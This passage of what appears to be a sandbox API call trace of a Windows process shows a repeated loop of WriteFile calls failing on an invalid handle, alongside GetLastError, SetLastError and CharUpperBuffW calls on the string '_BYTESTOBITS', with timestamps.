(dwErrCode=0x6) [0026.981] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.981] GetLastError () returned 0x6 [0026.981] GetLastError () returned 0x6 [0026.981] SetLastError (dwErrCode=0x6) [0026.981] GetLastError () returned 0x6 [0026.981] SetLastError (dwErrCode=0x6) [0026.981] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.981] GetLastError () returned 0x6 [0026.982] SetLastError (dwErrCode=0x6) [0026.982] GetLastError () returned 0x6 [0026.982] SetLastError (dwErrCode=0x6) [0026.982] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.982] GetLastError () returned 0x6 [0026.982] GetLastError () returned 0x6 [0026.982] SetLastError (dwErrCode=0x6) [0026.982] GetLastError () returned 0x6 [0026.982] SetLastError (dwErrCode=0x6) [0026.982] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.982] GetLastError () returned 0x6 [0026.982] SetLastError (dwErrCode=0x6) [0026.982] GetLastError () returned 0x6 [0026.982] SetLastError (dwErrCode=0x6) [0026.982] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.982] GetLastError () returned 0x6 [0026.982] GetLastError () returned 0x6 [0026.982] SetLastError (dwErrCode=0x6) [0026.982] GetLastError () returned 0x6 [0026.982] SetLastError (dwErrCode=0x6) [0026.983] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.983] GetLastError () returned 0x6 [0026.983] SetLastError (dwErrCode=0x6) [0026.983] GetLastError () returned 0x6 [0026.983] SetLastError (dwErrCode=0x6) [0026.983] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.983] GetLastError () returned 0x6 [0026.983] GetLastError () returned 0x6 [0026.983] SetLastError (dwErrCode=0x6) [0026.983] GetLastError () returned 0x6 [0026.983] SetLastError (dwErrCode=0x6) [0026.983] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.983] GetLastError () returned 0x6 [0026.983] SetLastError (dwErrCode=0x6) [0026.983] GetLastError () returned 0x6 [0026.983] SetLastError (dwErrCode=0x6) [0026.984] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.984] GetLastError () returned 0x6 [0026.984] GetLastError () returned 0x6 [0026.984] SetLastError (dwErrCode=0x6) [0026.984] GetLastError () returned 0x6 [0026.984] SetLastError (dwErrCode=0x6) [0026.984] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.984] GetLastError () returned 0x6 [0026.984] SetLastError (dwErrCode=0x6) [0026.984] GetLastError () returned 0x6 [0026.984] SetLastError (dwErrCode=0x6) [0026.984] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.984] GetLastError () returned 0x6 [0026.984] GetLastError () returned 0x6 [0026.984] SetLastError (dwErrCode=0x6) [0026.984] GetLastError () returned 0x6 [0026.984] SetLastError (dwErrCode=0x6) [0026.984] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.985] GetLastError () returned 0x6 [0026.985] SetLastError (dwErrCode=0x6) [0026.985] GetLastError () returned 0x6 [0026.985] SetLastError (dwErrCode=0x6) [0026.985] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.985] GetLastError () returned 0x6 [0026.985] GetLastError () returned 0x6 [0026.985] SetLastError (dwErrCode=0x6) [0026.985] GetLastError () returned 0x6 [0026.985] SetLastError (dwErrCode=0x6) [0026.985] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.985] GetLastError () returned 0x6 [0026.985] SetLastError (dwErrCode=0x6) [0026.985] GetLastError () returned 0x6 [0026.985] SetLastError (dwErrCode=0x6) [0026.985] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.985] GetLastError () returned 0x6 [0026.986] GetLastError () returned 0x6 [0026.986] SetLastError (dwErrCode=0x6) [0026.986] GetLastError () returned 0x6 [0026.986] SetLastError (dwErrCode=0x6) [0026.986] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.986] GetLastError () returned 0x6 [0026.986] SetLastError (dwErrCode=0x6) [0026.986] GetLastError () returned 0x6 [0026.986] SetLastError (dwErrCode=0x6) [0026.986] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.986] GetLastError () returned 0x6 [0026.986] GetLastError () returned 0x6 [0026.986] SetLastError (dwErrCode=0x6) [0026.986] GetLastError () returned 0x6 [0026.986] SetLastError (dwErrCode=0x6) [0026.986] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.987] GetLastError () returned 0x6 [0026.987] SetLastError (dwErrCode=0x6) [0026.987] GetLastError () returned 0x6 [0026.987] SetLastError (dwErrCode=0x6) [0026.987] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.987] GetLastError () returned 0x6 [0026.987] GetLastError () returned 0x6 [0026.987] SetLastError (dwErrCode=0x6) [0026.987] GetLastError () returned 0x6 [0026.987] SetLastError (dwErrCode=0x6) [0026.987] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.987] GetLastError () returned 0x6 [0026.987] SetLastError (dwErrCode=0x6) [0026.987] GetLastError () returned 0x6 [0026.987] SetLastError (dwErrCode=0x6) [0026.987] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.987] GetLastError () returned 0x6 [0026.987] GetLastError () returned 0x6 [0026.988] SetLastError (dwErrCode=0x6) [0026.988] GetLastError () returned 0x6 [0026.988] SetLastError (dwErrCode=0x6) [0026.988] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.988] GetLastError () returned 0x6 [0026.988] SetLastError (dwErrCode=0x6) [0026.988] GetLastError () returned 0x6 [0026.988] SetLastError (dwErrCode=0x6) [0026.988] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.988] GetLastError () returned 0x6 [0026.988] GetLastError () returned 0x6 [0026.988] SetLastError (dwErrCode=0x6) [0026.988] GetLastError () returned 0x6 [0026.988] SetLastError (dwErrCode=0x6) [0026.988] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.989] GetLastError () returned 0x6 [0026.989] SetLastError (dwErrCode=0x6) [0026.989] GetLastError () returned 0x6 [0026.989] SetLastError (dwErrCode=0x6) [0026.989] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.989] GetLastError () returned 0x6 [0026.989] GetLastError () returned 0x6 [0026.989] SetLastError (dwErrCode=0x6) [0026.989] GetLastError () returned 0x6 [0026.989] SetLastError (dwErrCode=0x6) [0026.989] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.989] GetLastError () returned 0x6 [0026.989] SetLastError (dwErrCode=0x6) [0026.989] GetLastError () returned 0x6 [0026.989] SetLastError (dwErrCode=0x6) [0026.989] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.989] GetLastError () returned 0x6 [0026.989] GetLastError () returned 0x6 [0026.989] SetLastError (dwErrCode=0x6) [0026.989] GetLastError () returned 0x6 [0026.989] SetLastError (dwErrCode=0x6) [0026.990] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.990] GetLastError () returned 0x6 [0026.990] SetLastError (dwErrCode=0x6) [0026.990] GetLastError () returned 0x6 [0026.990] SetLastError (dwErrCode=0x6) [0026.990] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.990] GetLastError () returned 0x6 [0026.990] GetLastError () returned 0x6 [0026.990] SetLastError (dwErrCode=0x6) [0026.990] GetLastError () returned 0x6 [0026.990] SetLastError (dwErrCode=0x6) [0026.990] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.990] GetLastError () returned 0x6 [0026.991] SetLastError (dwErrCode=0x6) [0026.991] GetLastError () returned 0x6 [0026.991] SetLastError (dwErrCode=0x6) [0026.991] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.991] GetLastError () returned 0x6 [0026.991] GetLastError () returned 0x6 [0026.991] SetLastError (dwErrCode=0x6) [0026.991] GetLastError () returned 0x6 [0026.991] SetLastError (dwErrCode=0x6) [0026.991] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.991] GetLastError () returned 0x6 [0026.991] SetLastError (dwErrCode=0x6) [0026.991] GetLastError () returned 0x6 [0026.991] SetLastError (dwErrCode=0x6) [0026.992] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.992] GetLastError () returned 0x6 [0026.992] GetLastError () returned 0x6 [0026.992] SetLastError (dwErrCode=0x6) [0026.992] GetLastError () returned 0x6 [0026.992] SetLastError (dwErrCode=0x6) [0026.992] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.992] GetLastError () returned 0x6 [0026.992] SetLastError (dwErrCode=0x6) [0026.992] GetLastError () returned 0x6 [0026.992] SetLastError (dwErrCode=0x6) [0026.992] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.992] GetLastError () returned 0x6 [0026.992] GetLastError () returned 0x6 [0026.992] SetLastError (dwErrCode=0x6) [0026.992] GetLastError () returned 0x6 [0026.992] SetLastError (dwErrCode=0x6) [0026.993] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.993] GetLastError () returned 0x6 [0026.993] SetLastError (dwErrCode=0x6) [0026.993] GetLastError () returned 0x6 [0026.993] SetLastError (dwErrCode=0x6) [0026.993] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.993] GetLastError () returned 0x6 [0026.993] GetLastError () returned 0x6 [0026.993] SetLastError (dwErrCode=0x6) [0026.993] GetLastError () returned 0x6 [0026.993] SetLastError (dwErrCode=0x6) [0026.993] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.994] GetLastError () returned 0x6 [0026.994] SetLastError (dwErrCode=0x6) [0026.994] GetLastError () returned 0x6 [0026.994] SetLastError (dwErrCode=0x6) [0026.994] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.994] GetLastError () returned 0x6 [0026.994] GetLastError () returned 0x6 [0026.994] SetLastError (dwErrCode=0x6) [0026.994] GetLastError () returned 0x6 [0026.994] SetLastError (dwErrCode=0x6) [0026.997] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.998] GetLastError () returned 0x6 [0026.998] SetLastError (dwErrCode=0x6) [0026.998] GetLastError () returned 0x6 [0026.998] SetLastError (dwErrCode=0x6) [0026.998] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.999] GetLastError () returned 0x6 [0026.999] GetLastError () returned 0x6 [0026.999] SetLastError (dwErrCode=0x6) [0026.999] GetLastError () returned 0x6 [0026.999] SetLastError (dwErrCode=0x6) [0026.999] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.999] GetLastError () returned 0x6 [0026.999] SetLastError (dwErrCode=0x6) [0026.999] GetLastError () returned 0x6 [0026.999] SetLastError (dwErrCode=0x6) [0026.999] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.999] GetLastError () returned 0x6 [0026.999] GetLastError () returned 0x6 [0026.999] SetLastError (dwErrCode=0x6) [0026.999] GetLastError () returned 0x6 [0026.999] SetLastError (dwErrCode=0x6) [0027.000] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.000] GetLastError () returned 0x6 [0027.000] SetLastError (dwErrCode=0x6) [0027.000] GetLastError () returned 0x6 [0027.000] SetLastError (dwErrCode=0x6) [0027.000] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.000] GetLastError () returned 0x6 [0027.000] GetLastError () returned 0x6 [0027.000] SetLastError (dwErrCode=0x6) [0027.000] GetLastError () returned 0x6 [0027.000] SetLastError (dwErrCode=0x6) [0027.000] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.000] GetLastError () returned 0x6 [0027.000] SetLastError (dwErrCode=0x6) [0027.000] GetLastError () returned 0x6 [0027.000] SetLastError (dwErrCode=0x6) [0027.000] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.001] GetLastError () returned 0x6 [0027.001] GetLastError () returned 0x6 [0027.001] SetLastError (dwErrCode=0x6) [0027.001] GetLastError () returned 0x6 [0027.001] SetLastError (dwErrCode=0x6) [0027.001] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.001] GetLastError () returned 0x6 [0027.001] SetLastError (dwErrCode=0x6) [0027.001] GetLastError () returned 0x6 [0027.001] SetLastError (dwErrCode=0x6) [0027.001] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.001] GetLastError () returned 0x6 [0027.001] GetLastError () returned 0x6 [0027.001] SetLastError (dwErrCode=0x6) [0027.001] GetLastError () returned 0x6 [0027.001] SetLastError (dwErrCode=0x6) [0027.001] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.002] GetLastError () returned 0x6 [0027.002] SetLastError (dwErrCode=0x6) [0027.002] GetLastError () returned 0x6 [0027.002] SetLastError (dwErrCode=0x6) [0027.002] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.002] GetLastError () returned 0x6 [0027.002] GetLastError () returned 0x6 [0027.002] SetLastError (dwErrCode=0x6) [0027.002] GetLastError () returned 0x6 [0027.002] SetLastError (dwErrCode=0x6) [0027.002] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.002] GetLastError () returned 0x6 [0027.002] SetLastError (dwErrCode=0x6) [0027.002] GetLastError () returned 0x6 [0027.002] SetLastError (dwErrCode=0x6) [0027.002] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.002] GetLastError () returned 0x6 [0027.002] GetLastError () returned 0x6 [0027.003] SetLastError (dwErrCode=0x6) [0027.003] GetLastError () returned 0x6 [0027.003] SetLastError (dwErrCode=0x6) [0027.003] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.003] GetLastError () returned 0x6 [0027.003] SetLastError (dwErrCode=0x6) [0027.003] GetLastError () returned 0x6 [0027.003] SetLastError (dwErrCode=0x6) [0027.003] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.003] GetLastError () returned 0x6 [0027.003] GetLastError () returned 0x6 [0027.003] SetLastError (dwErrCode=0x6) [0027.003] GetLastError () returned 0x6 [0027.003] SetLastError (dwErrCode=0x6) [0027.003] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.004] GetLastError () returned 0x6 [0027.004] SetLastError (dwErrCode=0x6) [0027.004] GetLastError () returned 0x6 [0027.004] SetLastError (dwErrCode=0x6) [0027.004] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.004] GetLastError () returned 0x6 [0027.004] GetLastError () returned 0x6 [0027.004] SetLastError (dwErrCode=0x6) [0027.004] GetLastError () returned 0x6 [0027.004] SetLastError (dwErrCode=0x6) [0027.004] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.004] GetLastError () returned 0x6 [0027.004] SetLastError (dwErrCode=0x6) [0027.004] GetLastError () returned 0x6 [0027.004] SetLastError (dwErrCode=0x6) [0027.004] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.004] GetLastError () returned 0x6 [0027.004] GetLastError () returned 0x6 [0027.004] SetLastError (dwErrCode=0x6) [0027.004] GetLastError () returned 0x6 [0027.005] SetLastError (dwErrCode=0x6) [0027.005] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.005] GetLastError () returned 0x6 [0027.005] SetLastError (dwErrCode=0x6) [0027.005] GetLastError () returned 0x6 [0027.005] SetLastError (dwErrCode=0x6) [0027.005] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.005] GetLastError () returned 0x6 [0027.005] GetLastError () returned 0x6 [0027.005] SetLastError (dwErrCode=0x6) [0027.005] GetLastError () returned 0x6 [0027.005] SetLastError (dwErrCode=0x6) [0027.005] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.005] GetLastError () returned 0x6 [0027.006] SetLastError (dwErrCode=0x6) [0027.006] GetLastError () returned 0x6 [0027.006] SetLastError (dwErrCode=0x6) [0027.006] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.006] GetLastError () returned 0x6 [0027.006] GetLastError () returned 0x6 [0027.006] SetLastError (dwErrCode=0x6) [0027.006] GetLastError () returned 0x6 [0027.006] SetLastError (dwErrCode=0x6) [0027.006] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.006] GetLastError () returned 0x6 [0027.006] SetLastError (dwErrCode=0x6) [0027.006] GetLastError () returned 0x6 [0027.006] SetLastError (dwErrCode=0x6) [0027.006] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.006] GetLastError () returned 0x6 [0027.006] GetLastError () returned 0x6 [0027.006] SetLastError (dwErrCode=0x6) [0027.006] GetLastError () returned 0x6 [0027.006] SetLastError (dwErrCode=0x6) [0027.007] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.007] GetLastError () returned 0x6 [0027.007] SetLastError (dwErrCode=0x6) [0027.007] GetLastError () returned 0x6 [0027.007] SetLastError (dwErrCode=0x6) [0027.007] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.007] GetLastError () returned 0x6 [0027.007] GetLastError () returned 0x6 [0027.007] SetLastError (dwErrCode=0x6) [0027.007] GetLastError () returned 0x6 [0027.007] SetLastError (dwErrCode=0x6) [0027.007] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.007] GetLastError () returned 0x6 [0027.007] SetLastError (dwErrCode=0x6) [0027.008] GetLastError () returned 0x6 [0027.008] SetLastError (dwErrCode=0x6) [0027.008] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.008] GetLastError () returned 0x6 [0027.008] GetLastError () returned 0x6 [0027.008] SetLastError (dwErrCode=0x6) [0027.008] GetLastError () returned 0x6 [0027.008] SetLastError (dwErrCode=0x6) [0027.008] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.008] GetLastError () returned 0x6 [0027.008] SetLastError (dwErrCode=0x6) [0027.008] GetLastError () returned 0x6 [0027.008] SetLastError (dwErrCode=0x6) [0027.008] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.008] GetLastError () returned 0x6 [0027.008] GetLastError () returned 0x6 [0027.008] SetLastError (dwErrCode=0x6) [0027.008] GetLastError () returned 0x6 [0027.008] SetLastError (dwErrCode=0x6) [0027.009] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.009] GetLastError () returned 0x6 [0027.009] SetLastError (dwErrCode=0x6) [0027.009] GetLastError () returned 0x6 [0027.009] SetLastError (dwErrCode=0x6) [0027.009] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.009] GetLastError () returned 0x6 [0027.009] GetLastError () returned 0x6 [0027.009] SetLastError (dwErrCode=0x6) [0027.009] GetLastError () returned 0x6 [0027.009] SetLastError (dwErrCode=0x6) [0027.009] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.009] GetLastError () returned 0x6 [0027.009] SetLastError (dwErrCode=0x6) [0027.009] GetLastError () returned 0x6 [0027.009] SetLastError (dwErrCode=0x6) [0027.010] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0027.010] GetLastError () returned 0x6 [0027.010] GetLastError () returned 0x6 [0027.010] SetLastError (dwErrCode=0x6) [0027.010] GetLastError () returned 0x6 [0027.010] SetLastError (dwErrCode=0x6) [0027.010] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.010] GetLastError () returned 0x6 [0027.010] SetLastError (dwErrCode=0x6) [0027.010] GetLastError () returned 0x6 [0027.010] SetLastError (dwErrCode=0x6) [0027.010] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, 